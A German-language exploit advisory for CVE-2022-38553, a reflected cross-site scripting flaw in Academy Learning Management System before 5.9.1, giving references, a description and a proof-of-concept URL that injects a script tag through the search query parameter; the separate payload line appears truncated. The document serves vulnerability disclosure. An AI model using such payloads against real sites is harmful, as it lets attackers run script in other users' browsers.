
CROSS-SITE-SCRIPTING (XSS) IM "ACADEMY LEARNING MANAGEMENT SYSTEM" - PROOF OF CONCEPT (POC) CVE-2022-38553
CROSS SITE SCRIPTING (XSS) IM "ACADEMY LEARNING MANAGEMENT SYSTEM" < v5.9.1 - PROOF OF CONCEPT (POC) CVE-2022-38553
Exploit-Titel: ACADEMY LEARNING MANAGEMENT SYSTEM < v5.9.1 - Cross Site Scripting (XSS)
CVE ID: CVE-2022-38553
Exploit-Autor: 4websecurity
Webseite des Autors: https://4websecurity.com
Datum: 16-08-2022
Hersteller-Webseite: https://creativeitem.com
Version: bis 5.9.1
Demo-Seite des Herstellers: https://demo.creativeitem.com/academy/home/
Referenz:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38553
https://www.openbugbounty.org/reports/2849933/
https://cve.report/CVE-2022-38553
https://nvd.nist.gov/vuln/detail/CVE-2022-38553
https://youtu.be/yFiZffHoeKs
Sicherheitslückenbereich:
Eine Cross-Site-Scripting (XSS)-Sicherheitslücke im ACADEMY LEARNING MANAGEMENT SYSTEM <5.9.1 ermöglicht es entfernten Angreifern, beliebige Web-Skripte oder HTML über den Parameter search?query einzuschleusen.
Proof Of Concept (POC):
https://example.com/search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
Payload:
">
Sicherheitsrisiko:
Diese Sicherheitslücke ermöglicht es, beliebigen JavaScript-Code im Browser des Benutzers auszuführen, wenn er eine von Angreifern vorbereitete URL aufruft.